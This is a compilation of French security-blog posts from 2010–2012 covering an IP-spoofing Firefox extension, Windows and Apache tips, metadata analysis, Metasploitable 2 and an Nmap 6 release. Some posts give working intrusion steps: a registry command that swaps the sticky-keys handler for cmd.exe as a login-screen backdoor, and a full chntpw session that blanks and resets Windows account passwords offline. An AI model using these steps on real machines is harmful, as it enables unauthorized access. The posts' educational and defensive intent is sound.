Oui, mais non : effectivement si la justice s’entête à considérer l’adresse IP comme une information nominative il va y avoir un certain nombre de faux positifs. Mais ce que je fais là, de façon automatisée, est faisable depuis des années avec un niveau en informatique très relatif. J’ai juste accéléré le process en l’automatisant , les faux positifs existent depuis que l’IP existe et sont une vraie plaie compte tenu du caractère sacro-saint donné à l’IP par la justice.

C’est justement pour faire sauter cette idée selon laquelle l’IP est une information sûre que j’ai créé IPFuck… Pour que la justice prenne conscience du fait que l’IP est un indice et non une preuve !

Je peux pas télécharger deux fichiers à la fois sur Rapidshare

Sans déconner ? Une plateforme qui gagne des millions en louant de la BP à des ados en manque de p0rn a mis en place des systèmes de sécurité un peu plus évolués que ceux que l’on peut contourner avec une extension firefox de 13ko ? Zut alors !

Plus sérieusement : ce n’est pas le but d’IPFuck que de vous faire économiser 17€ tous les trimestres… Et oui un certain nombre de sites et services se basent encore sur l’adresse IP telle que transmise par la couche de transport du réseau. La bonne nouvelle c’est que la protection de ces sites là peut être bypassée par l’utilisation d’un vrai proxy qui n’en n’aura que faire des adresses IP envoyées sur la couche application du réseau et qui pourtant (jusqu’à IPFuck et à part dans de très rares cas jusque là) contient la réelle adresse IP du visiteur.

IPFuck nous met à l’abri d’Hadopi

Faux, faux, faux et archi faux ! Personne n’est à l’abri d’Hadopi ! que vous téléchargiez ou non ! La encore c’est ce que j’essaye de prouver avec IPFuck et ce qui a déjà été prouvé avec SeedFuck que je ne trouvais pas assez « grand-public » pour que le message passe bien.

La quantité de faux positifs (là encore) va être phénoménale et les relevés d’IP truffés d’adresses dont les propriétaires ne savent même pas ce qu’est le P2P.

Pour revenir sur IPFuck : il agit uniquement sur les flux HTTP qui passent par firefox. Rappelons qu’Hadopi ne surveillera (dans un premier temps) que le P2P… Alors à moins que l’on me présente un logiciel de P2P qui passe en HTTP via Firefox je ne vois pas comment IPFuck pourrait nous sauver d’Hadopi.

IPFuck envoie 3 paquets supplémentaires

Techniquement faisable, concept intéressant même… Mais non ce n’est pas ce qui se passe ^^ Ce qu’IPFuck fait c’est qu’il ajoute aux paquets envoyés 3 adresses IP dans des entêtes habituellement réservées à contenir l’adresse IP réelle de quelqu’un qui utilise un proxy.

Le service web que l’on consulte va donc détecter que l’on est derrière un proxy et essayer de savoir qui est réellement derrière ce proxy en allant lire les fausses IP qu’IPFuck a ajouté aux paquets.

IPFuck rend anonyme

Toujours pas (en même temps c’est le principe de cet article) : l’utilisation massive d’IPFuck combinée à la présence déjà massive d’utilisateurs de proxy va rendre très difficile la distinction entre une personne effectivement derrière un proxy et un utilisateur d’IPFuck. Et donc leur identification. Mais il y a toujours, en examinant au cas par cas, moyen de retracer quelqu’un qu’il utilise un proxy ou IPFuck.

Cette vérification systématique n’est que très rarement effectuée et cela est regrettable : Hadopi notamment se base sur un relevé des IP (par une société privée *sic*) qui seront ensuite transmises aux FAI pour identification… Si l’adresse en question a été usurpée c’est quand même le réel propriétaire de l’adresse qui va être inquiété…

Mais alors ça sert à rien

C’est encore l’aberration la moins aberrante que j’ai lu à propos d’IPFuck. Techniquement cela n’impacte en rien votre connexion.

Pour le service web que vous visitez (site internet, application, …) par contre cela rend très difficile l’identification rapide. Après enquête il sera assez vite déterminé que votre IP réelle n’est pas un proxy et vous pourrez donc être inquiété si vous avez utilisé IPFuck, persuadé d’être anonyme, pour commettre un cyberdélit quelconque…

Par contre vous pouvez utiliser IPFuck, en le réglant sur une plage d’IP américaine par exemple, pour visionner du contenu réservé aux résidents des Etats-Unis…

Petit test pour le fun : paramétrez IPFuck pour choisir une IP qui commence par 68 et allez sur le site officiel de South Park voir les épisodes (« Full episodes »). Désactivez IPFuck et rafraichissez la page ?

Un autre test ? : laissez la plage IP entre 0.0.0.0 et 255.255.255.255 et allez sur ce site : http://geotool.flagfox.net/ A chaque rafraîchissement vous êtes citoyen d’un nouveau pays !

Ce qu’il faut en retenir

Encore une fois le message à faire passer ici tient en une phrase, et il s’adresse (ça en fait des adresses en un article) directement à tout ceux qui basent des lois sur des relevés d’IP : ne faites pas confiance à une adresse IP !

www.ipfuck.paulds.fr
www.paulds.fr/2010/06/ipfuck-alors-comme-ca-ladresse-ip-est-une-donnee-sure
www.paulds.fr/2010/06/petit-retour-sur-ipfuck

Mettre une backdoor sur l'écran de login de Windows

2012-07-28T17:59:00.001+02:00

En utilisant un mot de passe pour restreindre l'accès à un ordinateur sur Windows, on pense que ce poste est protégé contre une intrusion physique. Bien sûr, cela est en grande partie vrai dans la plupart des cas, mais cela ne signifie pas qu'il n'y a pas un moyen de contourner cette protection...

Ce n'est pas un exploit ou une faille à proprement parler, mais c'est une petite astuce assez surprenante, et également très facile à mettre en place.

On va simplement remplacer les touches rémanentes sur l'écran de connexion avec la ligne de commande, ce qui permettra donc en activant les touches rémanentes via le raccourci clavier qui va bien, d'avoir une invite de commande sous les yeux.

Seul petit bémol, il faut au préalable avoir à disposition une invite de commande avec les droits d'administrateur. Pour cela, on peut tenter la carte du social engineering.

Il faut saisir cette commande (sur une seule ligne) :

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

On ferme la session, de retour sur le login screen, on active les touches rémanentes en appuyant 5 fois sur la touche MAJ et...

Windows XP

Windows 7


Windows Serveur 2003

Windows Serveur 2008

On peut même lancer explorer.exe, ainsi que n'importe quel autre programme. Bref, la machine est totalement à nous.

Pour contrer efficacement ce type de modification, c'est simple, ne jamais laisser une session ouverte (avec des droits élevés ou non) sans surveillance, surtout dans une entreprise ou dans tout autre milieu sensible. La désactivation des touches rémanentes peut être une solution, mais on peut très bien adapter cette modification à un autre raccourci clavier...

Top 5 des commandes les plus importantes sur Windows

2012-07-27T14:52:00.002+02:00

Petit résumé non exhaustif des commandes les plus utiles sur Windows.

format c: :)

1. systeminfo

Affiche rapidement les informations sur la configuration du système d'exploitation pour un ordinateur local ou distant.

On peut apprendre :

le nom de l'hôte
le nom du système d'exploitation
la configuration du système
la date d'installation originale
l'heure de démarrage du système
le fabricant du système
le modèle du système
le modèle du processeur
la version du BIOS
la quantité de mémoire RAM libre et totale
des informations sur les correctifs installés
les informations des cartes réseau avec les adresses IPv4 et IPv6
Etc...

On peut l'utiliser également pour se connecter à une machine à distance grâce à la syntaxe suivante :

systeminfo /S nomdemonsuperpcquiarrache /U monsupernomdutilisateur /P monmotdepasse1234

2. ipconfig

Assez connue, celle-ci permet de voir l'adresse IP, le masque de sous réseau et la passerelle par défaut. On peut également manipuler le cache DNS, actualiser les baux DHCP, réinscrire les noms DNS, et plus encore.

ipconfig /all → affiche toutes les caractéristiques des connexions réseaux

ipconfig /flushdns → vide le cache de la résolution DNS
ipconfig /displaydns → affiche le contenu du cache de la résolution DNS

3. netstat 

C'est un excellent outil qui permet de savoir qui ou quoi tente d'établir (ou l'a déjà fait) une connexion sur la machine. La sortie de netstat fournit des informations précieuses sur toutes les connexions TCP/UDP avec les ports d'écoute respectifs, et de savoir quel programme tourne en arrière-plan.  

netstat -a → affiche toutes les informations de connexion

netstat -n → la sortie sous forme numérique

netstat -b → le nom de l'exécutable s'affiche

4. netsh 

Certainement l'outil le plus puissant de la ligne de commande sur Windows.

netsh est un véritable couteau suisse pour ce qui est de la configuration et la surveillance des ordinateurs Windows via l'invite de commande.

netsh interface ip show route → Liste la table de routage
netsh wlan show networks → Liste des réseaux WiFi disponiblesavec le type de chiffrement
netsh firewall show config → Affiche la liste des règles du pare-feu Windows

5. tasklist & taskkill 

Le Gestionnaire des tâches, ça vous parle ? Ici, c'est la même chose mais sans l'interface graphique. Il affiche les processus lancé sur une machine locale ou distante.

taskkill, permet d'engager une équipe de tueurs à gage afin de tuer un processus.

On peut l'utiliser soit avec le nom de la tâche :

tasklist /im calc.exe

Ou avec son PID.

tasklist /pid numeroPID

Analyse de métadonnées

2012-07-18T17:19:00.000+02:00

Beaucoup de personnes ne s'en doutent même pas, mais dans les documents courant tels que les images, PDF, documents Word/Exel, une archive, une musique, etc, y sont attachés des informations précieuses sur sa provenance, c'est ce que l’on appelle les métadonnées.

Ces métadonnées peuvent être très variées selon le type de document, Par exemple sur un document Word on peut facilement trouver le nom/prénom de l'auteur, le temps d'édition, la date de création/dernière modification. Sur des photos c'est encore pire, on peut savoir des réglages très précis comme le modèle d'appareil photo, la sensibilité ISO, des coordonnées GPS (merci les smartphones), la date, si le flash a été utilisé (si si), éventuellement le nom du logiciel de retouche utilisé, et j'en passe.

Il faut s'en douter, ces informations peuvent être très dangereuses pour une personne ayant fait de grosses bêtises... Si celle-ci n'est pas au courant de la présence de ces métadonnées, elle peut avoir du souci à se faire.

Un excellent outil pour analyser les métadonnées est disponible dans la plupart des distributions Linux récentes (installer le paquet libimage-exiftool-perl), il s'agit de exiftool.

Exemple avec une simple photo, l'argument -lang fr est optionnel, c'est simplement pour avoir la sortie en français :

root@bt/# exiftool -lang fr pedobear.jpg
Version ExifTool                : 8.60
Nom de fichier                  : pedobear.jpg
Dossier                         : /tmp
Taille du fichier               : 176 kB
Date/heure de modification du fichier: 2012:12:22 03:54:08+02:00
File Permissions                : rw-r--r--
Type de fichier                 : JPEG
Type MIME                       : image/jpeg
Indicateur d'ordre des octets Exif: Little-endian (Intel, II)
Description d'image             :
Fabricant                       : SONY
Modèle d'appareil photo         : DSC-H3
Orientation de l'image          : 0° (haut/gauche)
Résolution d'image horizontale : 72
Résolution d'image verticale    : 72
Unité de résolution en X et Y   : Pouce
Date de modification de fichier : 2012:12:24 12:65:49
Positionnement Y et C           : Côte à côte
Temps de pose                   : 1/4
Nombre F                        : 3.5
Programme d'exposition          : Programme normal
Sensibilité ISO                 : 640
Version Exif                    : 0221
Date de la création des données originales: 2012:12:24 12:65:49
Date de la création des données numériques: 2012:12:24 12:65:49
Signification de chaque composante: Y, Cb, Cr, -
Mode de compression d'image     : 4
Décalage d'exposition           : 0
Ouverture maximale de l'objectif: 3.5
Mode de mesure                  : Multizone
Source de lumière               : Inconnue
Flash                           : Flash non déclenché, mode flash forcé
Focale de l'objectif            : 6.3 mm
Color Reproduction              : Vivid
Macro                           : Activé
Mode mise au point              : AF-S (prise de vue unique)
Mode AF                         : Multi AF
AF Illuminator                  : Auto
Qualité                         : Normale
Flash Level                     : Unknown (2)
Release Mode                    : Burst
Numéro de Séquence              : 1
Anti-Blur                       : On (Shooting)
Réduct. bruit longue expo.      : Arrêt
Version Flashpix supportée      : 0100
Espace colorimétrique           : sRVB
Largeur d'image                 : 640
Hauteur d'image                 : 480
Identification d'interopérabilité: R98: fichier de base DCF (sRGB)
Version d'interopérabilité      : 0100
Source du fichier               : Appareil photo numérique
Type de scène                   : Image photographiée directement
Traitement d'image personnalisé : Traitement normal
Mode d'exposition               : Exposition automatique
Balance des blancs              : Equilibrage des blancs automatique
Type de capture de scène        : Standard
Contraste                       : Normale
Saturation                      : Normale
Accentuation                    : Dure
PrintIM Version                 : 0300
Schéma de compression           : JPEG (ancien style)
Thumbnail Offset                : 9384
Thumbnail Length                : 3004
Largeur d'image                 : 640
Hauteur d'image                 : 480
Procédé de codage               : Baseline DCT, codage Huffman
Nombre de bits par échantillon : 8
Composants colorimétriques      : 3
Rapport de sous-échantillonnage Y à C: YCbCr4:2:0 (2 2)
Ouverture                       : 3.5
Taille de l'Image               : 640x480
Temps de pose                   : 1/4
Vignette                        : (Binary data 3004 bytes, use -b option to extract)
Focale de l'objectif            : 6.3 mm
Luminosite                      : 2.9

Oui, il y a de quoi faire peur. Essayez avec d'autres types de fichiers pour voir :)
Sa page de manuel (en saisissant : man exiftool) est très bien fournie, avec pas mal d'exemples.

Exiftool est un outil beaucoup plus puissant, il permet bien plus que de lire les informations. Il gère également énormément de formats de fichiers.

C'est une méthode couramment utilisée dans le cas d'une analyse forensique.

www.sno.phy.queensu.ca/~phil/exiftool

15 astuces pour les fichiers .htaccess

2012-07-11T16:27:00.002+02:00

Une compilation d'astuces pour les fichiers .htaccess des serveurs web Apache.

.htaccess ??

Ce sont des fichiers de configuration d'Apache qui permettent de définir des règles dans un répertoire ou sous-répertoire.

On le place dans le répertoire dans lequel il doit agir. Il agit donc sur les permissions du répertoire et de tous ses sous-répertoires également.
En revanche, il est possible de placer un autre fichier .htaccess dans un sous-répertoire déjà sous la surveillance d'un autre fichier .htaccess.
Le fichier .htaccess du répertoire parent reste actif tant que les nouvelles règles n'ont pas été réécrites.

Les principales raisons d'utilisation des fichiers .htaccess sont :

Gérer l'accès de certains fichiers
Ajouter un Type MIME
Protéger l'accès à un répertoire ou à un fichier par un mot de passe
Définir des pages d'erreurs personnalisées suivant le code d'erreur

Les présentations sont faites :)

1. Rediriger le navigateur vers une version HTTPS

RewriteEngine On
RewriteCond %{HTTPS} !on
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}

2. Empêcher l'accès aux fichiers .htaccess

<Files . htaccess>
order allow,deny
deny from all
</Files>

3. Empêcher l'accès à un fichier spécifique

<Files femmenue.jpg>
order allow,deny
deny from all
</Files>

4. Changer la page d'index par défaut

DirectoryIndex accueil.html

5. Limiter l'accès au réseau local (LAN)

<Limit GET POST PUT>
order deny,allow
deny from all
allow from 192.168.0.0/24
</Limit>

6. Bloquer ou autoriser des adresses IP multiples

# bloquer 2 adresses IP
deny from 11.22.33.44 55.66.77.88

# autoriser 3 adresses IP
allow from 12.34.56.78 90.98.76.54 32.10.12.34

7. Ce prémunir contre le déni de service (DoS) en limitant la taille de téléchargement des fichiers

# 10240000 vaut 10Mo

LimitRequestBody 10240000

8. Des pages d'erreur personnalisées

ErrorDocument 400 /errors/400.html
ErrorDocument 401 /errors/401.html
ErrorDocument 403 /errors/403.html
ErrorDocument 404 /errors/404.html
ErrorDocument 500 /errors/500.html

9. Redirection à partir de http://www.mondomaine.com à http://mondomaine.com

RewriteEngine on
Options +FollowSymLinks
RewriteCond %{HTTP_HOST} ^www\.mondomaine\.tld$ [NC]
RewriteRule ^(.*)$ http://mondomaine.tld/$1 [R=301,L]

10. Désactiver la signature du serveur

ServerSignature Off

11. L'adresse e-mail pour l'administrateur du serveur (pour le ~~pourrir~~ féliciter de son super boulot :) )

SetEnv SERVER_ADMIN admin@mondomaine.com

12. Améliorer la vitesse du site par avec la mise en cache des fichiers (temps en secondes)

# images et flash pendant un jour
<FilesMatch ".(jpg|jpeg|png|gif|flv|swf)$">
Header set Cache-Control "max-age=43200"
</FilesMatch>

# fichiers texte, css et javascript en cache pendant un mois
<FilesMatch ".(js|css|pdf|txt)$">
Header set Cache-Control "max-age=2592000"
</FilesMatch>

# fichiers html et htm pendant une semaine
<FilesMatch ".(html|htm)$">
Header set Cache-Control "max-age=604800"
</FilesMatch>

13. Afficher le code source d'un script plutôt que de l’exécuter

RemoveHandler cgi-script .cgi .pl .py

14. Déclaration de Type MIME

AddType image/x-icon .ico
AddType video/x-flv .flv
AddType application/x-shockwave-flash .swf

15. Demander au navigateur de télécharger le fichiers plutôt que de l'afficher

AddType application/octet-stream .avi
AddType application/octet-stream .mp4
AddType application/octet-stream .ogg
AddType application/octet-stream .mp3

The Paranoid Kit - Firefox protège encore plus votre vie privée

2012-07-02T00:16:00.000+02:00

Si vous êtes le genre de personnes qui se soucient un minimum de la protection de leurs vies privées sur Internet, et aussi un fervent utilisateur de Firefox, cette collection nommée The Paranoid Kit regroupe actuellement 9 modules qui ont tous un unique but commun : protéger d'avantage votre vie privée sur le Web.

Cette collection contient forcement les plus connus comme Adblock Plus ou NoScript, mais également d’autres, dont leurs noms ne vous évoqueront pas grand chose comme Redirect Remover ou BetterPrivacy.

Le point fort d’une telle collection est sans doutes qu'elle évite de passer des heures à retourner les tonnes de modules que Firefox dispose.

Les 9 extensions :

Adblock Plus
NoScript
User Agent Switcher
LastPass Password Manager
BetterPrivacy
Collusion
TrackerBlock
Redirect Remover
Beef Taco

Pour avoir des détails ou pour les installer, il suffit de ce rendre sur la page de la collection. L'auteur y laisse une petite note, pour plus d'informations.

Personnellement, je conseille également Ghostery. On peut également parler de l'utilisation conjointe des ces modules avec le réseau TOR.

Metasploitable 2

2012-06-13T22:14:00.000+02:00

Après une première version de Metasploitable, une bonne mise à jour est offerte à la machine virtuelle volontairement vulnérable basée sur Ubuntu, conçue pour tester les outils de sécurité et de démontrer les vulnérabilités logicielles courantes. Cette dernière offre encore plus de vulnérabilités que la précédente.

Cette machine virtuelle est compatible avec VirtualBox, VMWare ainsi que d'autres plates-formes de virtualisation. Bien sûr, cette distribution ne doit jamais être exposée sur un réseau contrôlé.

En effet celle-ci offre à l'utilisateur une multitude de services vulnérables comme MySQL, SSH, Tikiwiki, Telnet, Apache, FTP, Tomcat (et j'en passe) afin de pouvoir ce faire les dents dessus :)

Ce qui est sympa avec, c'est que vous pouvez la déflorer dans tout les sens , lui extorquer ses mots de passe, sans aucun risque. Après un simple reboot, elle reprendra sa configuration initiale. Source

Mise en route :

Une fois lancée dans une machine virtuelle, il faut utiliser l'utilisateur et le mot de passe msfadmin.

Avec BackTrack, nous allons identifier les services lancés sur cette machine grâce à Nmap.
Avec ses quelques informations, il y a déjà de quoi faire...
Reste plus qu'a bosser pour avoir un shell en comprenant et en exploitant les failles :)

root@bt:~# nmap -sV -O -p0-65535 192.168.69.8

Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-13 22:01 CEST
Nmap scan report for 192.168.69.8
Host is up (0.0033s latency).
Not shown: 65507 closed ports
PORT      STATE SERVICE                  VERSION
21/tcp    open ftp                      vsftpd 2.3.4
22/tcp    open ssh                      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open telnet                   Linux telnetd
25/tcp    open smtp                     Postfix smtpd
53/tcp    open domain                   ISC BIND 9.4.2
80/tcp    open http                     Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open rpcbind (rpcbind V2)     2 (rpc #100000)
139/tcp   open netbios-ssn              Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open netbios-ssn              Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open exec                     netkit-rsh rexecd
513/tcp   open login
514/tcp   open tcpwrapped
1099/tcp open rmiregistry              GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4)           2-4 (rpc #100003)
2121/tcp open ftp                      ProFTPD 1.3.1
3306/tcp open mysql                    MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd                  distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql               PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc                      VNC (protocol 3.3)
6000/tcp open X11                      (access denied)
6667/tcp open irc                      Unreal ircd
6697/tcp open irc                      Unreal ircd
8180/tcp open unknown
8787/tcp open unknown
42900/tcp open unknown
52593/tcp open mountd (mountd V1-3)     1-3 (rpc #100005)
53379/tcp open status (status V1)       1 (rpc #100024)
56599/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)

MAC Address: 09:38:21:5E:97:81 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.20 seconds

Chacun de ces services est une porte d'entrée potentielle afin de prendre le contrôle du système. A vous de les exploiter !

Metasploitable 2 est disponible sur SourceForge et sur The Pirate Bay.

$ md5sum metasploitable-linux-2.0.0.zip

8825f2509a9b9a58ec66bd65ef83167f metasploitable-linux-2.0.0.zip

$ sha1sum metasploitable-linux-2.0.0.zip

84133002ef79fc191e726d41265cf5ab0dfad2f0 metasploitable-linux-2.0.0.zip

Have fun :)

PS : Si vous ne voulez pas jouer le jeu, un document qui recense les failles présentes et comment les exploiter.

Faire sauter un mot de passe de session sur Windows

2012-06-09T20:29:00.000+02:00

Il arrive bien souvent dans de nombreux cas, où on retrouve dans ses mains une machine sous Windows verrouillée, et bien sûr, personne ne ce souvient du mot de passe... Et si on le bidouiller un peu ?

Mais comment s'y prendre ?

Premier réflexe, voir si dans les outils de BackTrack il existe un soft capable de faire ce boulot. Et réponse, oui !

Ce programme s’appelle chntpw. Il nous permettra d'enlever simplement le mot de passe du compte (celui de l'admin, tant qu'a faire) de notre choix.

À l'attaque !

Il faut donc, lancer BackTrack en live sur la machine cible et monter la partition (ici WINSEVEN) du disque-dur qui contient Windows. Ensuite, on lance chntpw dans le menu Applications puis Accessoires → BackTrack → Privilege Escalation → Passwords Attacks → Offline Attacks → chntpw.

root@bt:/pentest/passwords/chntpw# ./chntpw
chntpw version 0.99.6 110511 , (c) Petter N Hagen
chntpw: change password of a user in a Windows SAM file,
or invoke registry editor. Should handle both 32 and 64 bit windows and
all version from NT3.x to Win7
chntpw [OPTIONS] <samfile> [systemfile] [securityfile] [otherreghive] [...]
-h          This message
-u <user>   Username to change, Administrator is default
-l          list all users in SAM file
-i          Interactive. List users (as -l) then ask for username to change
-e          Registry editor. Now with full write support!
-d          Enter buffer debugger instead (hex editor),
-v          Be a little more verbose (for debuging)
-L          For scripts, write names of changed files to /tmp/changed
-N          No allocation mode. Only same length overwrites possible (very safe mode)
-E          No expand mode, do not expand hive file (safe mode)
See readme file on how to get to the registry files, and what they are.
Source/binary freely distributable under GPL v2 license. See README for details.
NOTE: This program is somewhat hackish! You are on your own!

Comme quoi, il offre pas mal de possibilité, par exemple l'énumération de tous les utilisateurs -l, l'édition du registre -e et un mode interactif avec l'argument -i, ce que nous allons utiliser de suite.

root@bt:/pentest/passwords/chntpw# ./chntpw /media/WINSEVEN/Windows/System32/config/SAM -i
chntpw version 0.99.6 110511 , (c) Petter N Hagen
Hive </media/WINSEVEN/Windows/System32/config/SAM> name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf>
File size 262144 [40000] bytes, containing 12 pages (+ 1 headerpage)
Used for data: 364/193184 blocks/bytes, unused: 11/19424 blocks/bytes.

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: </media/WINSEVEN/Windows/System32/config/SAM>

1 - Edit user data and passwords
      - - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1   // Pour éditer les comptes

===== chntpw Edit User Info & Passwords ====

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 03ea | admin                          | ADMIN | dis/lock |
| 01f4 | Administrateur                 | ADMIN | dis/lock |
| 03eb | alain                          |        | *BLANK* |
| 03ef | frederic                       | ADMIN | dis/lock |
| 03ee | guillaume                      |        | dis/lock |
| 03e9 | HomeGroupUser$                 |        |          |
| 01f5 | Invité                         |        | dis/lock |
| 03ec | jacques                        |        | *BLANK* |
| 03ed | kevin                          |        | dis/lock |

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrateur]

À ce stade, nous pouvons remarquer qu'il y a :

3 comptes avec les droits d'administrateur (admin ~~vraiment?~~, Administrateur ~~sans blague~~ et frederic)
2 comptes, alain et jacques, n'ont pas de mot de passe
guillaume et kevin, ont un mot de passe, mais n'ont pas les droits

SAM est le fichier qui contient les mots de passes de Windows.

On continue !

or simply enter the username to change: [Administrateur] ENTRÉE   // utilisateur par défaut [Administrateur]

RID     : 0500 [01f4]
Username: Administrateur
fullname:
comment : Compte d'utilisateur d'administration
homedir :

User is member of 1 groups:
00000220 = Administrateurs (which has 3 members)

Account bits: 0x0211 =
[X] Disabled        | [ ] Homedir req.    | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 2, while max tries is: 0
Total login count: 1

- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
4 - Unlock and enable user account [probably locked now]
q - Quit editing user, back to user select
Select: [q] > 1 // Pour effacer le mot de passe
Password cleared!

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrateur] frederic     // On désire modifier le compte frederic

RID     : 1007 [03ef]
Username: frederic
fullname: frederic
comment :
homedir :

User is member of 1 groups:
00000220 = Administrateurs (which has 3 members)

Account bits: 0x0210 =
[ ] Disabled        | [ ] Homedir req.    | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 0

- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
(4 - Unlock and enable user account) [seems unlocked already]
q - Quit editing user, back to user select
Select: [q] > 2   // On édite un nouveau mot de passe
New Password: newpassword   // Et un mot de passe au choix, un !
Password changed!

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrateur] !       // Pour quitter, quand le boulot est terminé

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: </media/WINSEVEN/Windows/System32/config/SAM>

1 - Edit user data and passwords
      - - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> q     // On quitte, pour sauvegarder les modifications

Hives that have changed:
# Name
0 </media/WINSEVEN/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : y      // On sauvegarde
0 </media/WINSEVEN/Windows/System32/config/SAM> - OK

root@bt:/pentest/passwords/chntpw#

Pour résumer, nous avons effacé le mot de passe de Administrateur, et modifié celui de frederic. Et... Ne pas oublier d'enregistrer avant de quitter !

On relance la machine sur Windows, et on admire !

Il est également possible de donner les droits à un utilisateur et de dévérouiller/activer un compte.

En conclusion, on peut donc en déduire qu’il est totalement inutile de mettre un mot de passe sur Windows, dans le cas où on a un accès physique à la machine.

Afin d'empêcher un intrus de réinitialiser les paramètres du BIOS (et donc faire sauter le mot de passe) en ouvrant l'unité centrale et de booter sur un système live (ce qui lui offrira tous les des droits sur la machine), il faut :

Limiter l'accès physique à l'ordinateur salle verrouillée et surveillée ~~des tanks et le GIGN~~

Sécuriser le démarrage de l'ordinateur. Empêcher l'ouverture de la machine, sinon un vilain brigand pourra changer l'ordre de démarrage, virer le mot de passe, ou au faire un Clear CMOS. Un bon gros cadenas sur le boîtier fera l'affaire. Chiffrer les disques-durs est un bon moyen également.

Cerise sur le gâteau, chntpw est compatible avec toutes les versions de Windows.

Nmap 6

2012-05-21T23:18:00.000+02:00

C'est après trois ans de développement depuis la version 5 (Juillet 2009) que la version 6 du scanner par excellence Nmap voit le jour. Au menu, un moteur plus performant pour NSE, 289 nouveaux scripts, le support complet de l'IPv6, l'amélioration de la vitesse... et bien plus !

Nmap est l'outil de référence en matière de scan.

C'est un scanner de ports open source et multiplate-forme, qui permet de détecter les ports ouverts, d'identifier des services lancés, d'obtenir des informations sur le système d'exploitation, savoir si la machine a des backdoors connues, avoir une véritable carte d'un réseau, connaitre les règles d'un pare-feu/IDS... Bref, un couteau suisse qui deviendra indispensable pour les administrateurs réseaux et bidouilleurs que nous sommes.

Le top des nouveautés :

Nmap Scripting Engine (NSE) passe à 348 modules, il y en avais 59 dans la version 5
Un meilleur résultat des scans Web - L'énumération des applications est améliorée, ainsi que de nombreuses tâches HTTP. Le support des dernières technologies telles que le cryptage SSL, le pipelining HTTP, et les mécanismes de mise en cache sont supportées maintenant
Prise en charge complète d'IPv6
Amélioration de Zenmap, le GUI officiel
Beaucoup de travail concernant l’augmentation des performances durant les scans, sans pour autant nuire à la précision.

Nmap est disponible pour Windows, Unix et MacOS X.

Bon boulot Fyodor !

www.nmap.org

Social Engineer Toolkit 3.3 - DerbyCon 2.0 Edition

2012-05-21T20:34:00.000+02:00

Après un long cycle de développement, cette nouvelle version nous apporte beaucoup de nouveautés, notamment avec de nouveaux vecteurs d'attaque via powershell.

On peux citer :

Grosse implémentation des attaques via powershell
Mises à jour de Fast-Track
Ajout des derniers exploits de Metasploit
Augmentation des performances
Optimisation du code
Correction de bugs

Une petite démonstration :

SET 3.4 est disponible ici.

Pour le mettre à jour :

Faire tout simplement le choix 5 dans le menu et ensuite relancer SET.

Pour l'installer :

root@localhost~$ sudo svn co http://svn.secmaniac.com/social_engineering_toolkit set/

La liste de toutes les nouveautés est ici.

www.secmaniac.com

Faille de sécurité sur PHP 5.3 et 5.4

2012-05-05T14:05:00.001+02:00

Une faille de sécurité critique vient d'être découverte dans les versions 5.3 et 5.4 de PHP. Avec une simple requête HTTP, il est possible d'afficher le code source de la page (et donc, les mots de passe utilisés), ou même d'exécuter du code à distance.

La faille :

Pour pouvoir exploiter cette faille, il faut que les conditions suivantes soit réunies :

La version de PHP doit être inférieure à la 5.3.12 ou à la 5.4.2
L'interpréteur PHP doit fonctionner en mode CGI (pas actif par défaut, ouf)
La requête HTTP doit être du type Query String et commencer uniquement par le signe - et ne doit pas comprendre de signe =
La requête peut être un GET ou un HEAD

Il faut noter que les modules FastCGI, mod_suphp, nginx+php-fpm et apache+mod_php ne sont pas concernés par ce problème.

